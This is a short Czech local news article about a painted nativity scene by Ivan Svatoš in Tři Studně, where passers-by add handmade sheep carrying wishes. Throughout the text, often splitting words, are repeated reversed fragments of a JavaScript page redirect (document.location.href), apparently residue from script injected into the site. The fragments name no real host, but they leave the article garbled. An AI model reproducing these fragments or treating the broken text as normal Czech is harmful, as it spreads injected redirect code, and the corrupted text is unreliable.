Tři Studně, tri studne, aktuality, betlém
Rainbow page separator

Betlém opět čeká na kolemjdoucí a ovečky

Pátek, 28. prosince 2012

Tři Studně / Tradiční malovaný betlém opět s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tojí v centru Třech Studní na Novoměstsku. Jeho au[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tor, výtvarník Ivan Sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toš, ovšem říká, že betlém je úplný až po vánočních svátcích.Kolemjdoucí lidé do něj [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];totiž v jejich průběhu vkládají ručně vyrobené ovečky s přáníčky pro štěstí. „Těší mě, že ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to nová tradice vznikla zcela spontánně. U betléma se například každým rokem schází skupina důchodců, kteří u něj se svíčkami zpívají koledy,“ říká malíř známého rozcestníku na náměstí Evropské unie v miniaturních Třech Studních.

Unikátní malovaný betlém dosahuje úctyhodných rozměrů, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to 3,84 metru na šířku a 132 centimetrů na výšku, a je nainstalován před Letní minigalerií ve Třech Studních.

Návštěvníci netradičního objektu najdou v zasněžené krajině obrazů Ivana Sva[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];toše známé objekty, jako je například památka UNESCO – Santiniho poutní kostel svatého Jana Nepomuckého na Zelené hoře ve Žďáře nad Sázavou či „domácí“ kaplička ve Třech Studních. Betlém si mohou zájemci prohlédnout do 6. ledna 2013.